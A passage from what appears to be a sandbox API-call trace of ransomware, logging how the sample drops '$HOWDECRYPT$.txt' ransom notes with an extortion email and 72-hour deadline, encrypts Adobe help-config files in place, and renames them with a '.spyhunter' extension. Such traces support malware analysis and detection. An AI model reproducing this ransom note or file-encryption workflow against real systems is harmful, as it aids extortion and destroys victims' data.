() returned 0x2c0000 [0179.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e76308 | out: hHeap=0x2c0000) returned 1 [0179.737] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sk_sk\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.738] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.738] WriteFile (in: hFile=0x178, lpBuffer=0x57e227*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e350, lpOverlapped=0x0 | out: lpBuffer=0x57e227*, lpNumberOfBytesWritten=0x57e350*=0x127, lpOverlapped=0x0) returned 1 [0179.738] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.738] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e350, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e350*=0x2ac, lpOverlapped=0x0) returned 1 [0179.739] CloseHandle (hObject=0x178) returned 1 [0179.739] GetProcessHeap () returned 0x2c0000 [0179.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e76220 | out: hHeap=0x2c0000) returned 1 [0179.739] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e2f0 | out: pbBuffer=0x57e2f0) returned 1 [0179.739] GetProcessHeap () returned 0x2c0000 [0179.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.739] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e2e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e2e8*=0x30) returned 1 [0179.739] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sk_sk\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.740] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Reader_10.0.helpcfg") returned 79 [0179.740] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.740] GetProcessHeap () returned 0x2c0000 [0179.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0179.740] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e2ac*=0x15d, lpOverlapped=0x0) returned 1 [0179.777] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.777] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x57e2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e2ac*=0x15d, lpOverlapped=0x0) returned 1 [0179.777] GetProcessHeap () returned 0x2c0000 [0179.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0179.777] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.777] WriteFile (in: hFile=0x178, lpBuffer=0x57e2ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e2ac, lpOverlapped=0x0 | out: lpBuffer=0x57e2ec*, lpNumberOfBytesWritten=0x57e2ac*=0x4, lpOverlapped=0x0) returned 1 [0179.777] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e2ac, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e2ac*=0x30, lpOverlapped=0x0) returned 1 [0179.777] CloseHandle (hObject=0x178) returned 1 [0179.777] GetProcessHeap () returned 0x2c0000 [0179.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0179.777] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.777] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sk_sk\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sk_SK\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sk_sk\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.778] GetProcessHeap () returned 0x2c0000 [0179.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0179.778] GetProcessHeap () returned 0x2c0000 [0179.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.778] GetProcessHeap () returned 0x2c0000 [0179.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e76138 | out: hHeap=0x2c0000) returned 1 [0179.779] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nb_no\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.781] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.781] WriteFile (in: hFile=0x178, lpBuffer=0x57e21f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e348, lpOverlapped=0x0 | out: lpBuffer=0x57e21f*, lpNumberOfBytesWritten=0x57e348*=0x127, lpOverlapped=0x0) returned 1 [0179.782] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.782] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e348, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e348*=0x2ac, lpOverlapped=0x0) returned 1 [0179.782] CloseHandle (hObject=0x178) returned 1 [0179.782] GetProcessHeap () returned 0x2c0000 [0179.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e75740 | out: hHeap=0x2c0000) returned 1 [0179.783] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e2e8 | out: pbBuffer=0x57e2e8) returned 1 [0179.783] GetProcessHeap () returned 0x2c0000 [0179.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.783] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e2e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e2e0*=0x30) returned 1 [0179.783] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nb_no\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.783] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Reader_10.0.helpcfg") returned 79 [0179.783] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.783] GetProcessHeap () returned 0x2c0000 [0179.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0179.784] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e2a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e2a4*=0x15d, lpOverlapped=0x0) returned 1 [0179.784] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.784] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x57e2a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e2a4*=0x15d, lpOverlapped=0x0) returned 1 [0179.784] GetProcessHeap () returned 0x2c0000 [0179.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0179.784] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.785] WriteFile (in: hFile=0x178, lpBuffer=0x57e2e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e2a4, lpOverlapped=0x0 | out: lpBuffer=0x57e2e4*, lpNumberOfBytesWritten=0x57e2a4*=0x4, lpOverlapped=0x0) returned 1 [0179.785] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e2a4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e2a4*=0x30, lpOverlapped=0x0) returned 1 [0179.785] CloseHandle (hObject=0x178) returned 1 [0179.785] GetProcessHeap () returned 0x2c0000 [0179.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0179.785] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.785] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nb_no\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\nb_NO\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\nb_no\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.786] GetProcessHeap () returned 0x2c0000 [0179.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0179.786] GetProcessHeap () returned 0x2c0000 [0179.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.786] GetProcessHeap () returned 0x2c0000 [0179.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e75658 | out: hHeap=0x2c0000) returned 1 [0179.786] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ko_kr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.786] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.787] WriteFile (in: hFile=0x178, lpBuffer=0x57e217*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e340, lpOverlapped=0x0 | out: lpBuffer=0x57e217*, lpNumberOfBytesWritten=0x57e340*=0x127, lpOverlapped=0x0) returned 1 [0179.788] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.788] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e340, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e340*=0x2ac, lpOverlapped=0x0) returned 1 [0179.789] CloseHandle (hObject=0x178) returned 1 [0179.789] GetProcessHeap () returned 0x2c0000 [0179.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e75570 | out: hHeap=0x2c0000) returned 1 [0179.789] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e2e0 | out: pbBuffer=0x57e2e0) returned 1 [0179.789] GetProcessHeap () returned 0x2c0000 [0179.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.789] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e2d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e2d8*=0x30) returned 1 [0179.789] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ko_kr\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.790] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Reader_10.0.helpcfg") returned 79 [0179.790] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.790] GetProcessHeap () returned 0x2c0000 [0179.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0179.790] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e29c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e29c*=0x15d, lpOverlapped=0x0) returned 1 [0179.790] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.791] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x57e29c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e29c*=0x15d, lpOverlapped=0x0) returned 1 [0179.792] GetProcessHeap () returned 0x2c0000 [0179.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0179.792] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.792] WriteFile (in: hFile=0x178, lpBuffer=0x57e2dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e29c, lpOverlapped=0x0 | out: lpBuffer=0x57e2dc*, lpNumberOfBytesWritten=0x57e29c*=0x4, lpOverlapped=0x0) returned 1 [0179.792] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e29c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e29c*=0x30, lpOverlapped=0x0) returned 1 [0179.792] CloseHandle (hObject=0x178) returned 1 [0179.792] GetProcessHeap () returned 0x2c0000 [0179.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0179.792] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.792] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ko_kr\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ko_KR\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ko_kr\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.793] GetProcessHeap () returned 0x2c0000 [0179.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0179.793] GetProcessHeap () returned 0x2c0000 [0179.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0179.793] GetProcessHeap () returned 0x2c0000 [0179.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e75488 | out: hHeap=0x2c0000) returned 1 [0179.793] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ja_jp\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.794] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.794] WriteFile (in: hFile=0x178, lpBuffer=0x57e20f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e338, lpOverlapped=0x0 | out: lpBuffer=0x57e20f*, lpNumberOfBytesWritten=0x57e338*=0x127, lpOverlapped=0x0) returned 1 [0179.795] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.795] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e338, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e338*=0x2ac, lpOverlapped=0x0) returned 1 [0179.795] CloseHandle (hObject=0x178) returned 1 [0179.795] GetProcessHeap () returned 0x2c0000 [0179.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e753a0 | out: hHeap=0x2c0000) returned 1 [0179.795] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e2d8 | out: pbBuffer=0x57e2d8) returned 1 [0179.795] GetProcessHeap () returned 0x2c0000 [0179.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0179.795] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e2d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e2d0*=0x30) returned 1 [0179.795] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\ja_jp\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0179.796] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\ja_JP\\Reader_10.0.helpcfg") returned 79 [0179.796] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.796] GetProcessHeap () returned 0x2c0000 [0179.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0179.798] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e294, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e294*=0x15d, lpOverlapped=0x0) returned 1 [0179.799] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.799] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x57e294, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e294*=0x15d, lpOverlapped=0x0) returned 1 [0179.799] GetProcessHeap () returned 0x2c0000 [0179.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0179.799] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.799] WriteFile (in: hFile=0x178, lpBuffer=0x57e2d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e294, lpOverlapped=0x0 | out: lpBuffer=0x57e2d4*, lpNumberOfBytesWritten=0x57e294*=0x4, lpOverlapped=0x0) returned 1 [0179.799] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e294, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e294*=0x30, lpOverlapped=0x0) returned 1 [0179.800] CloseHandle (hObject=0x178) returned 1 [0179.800] GetProcessHeap () returned 0x2c0000 [0179.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0179.800] 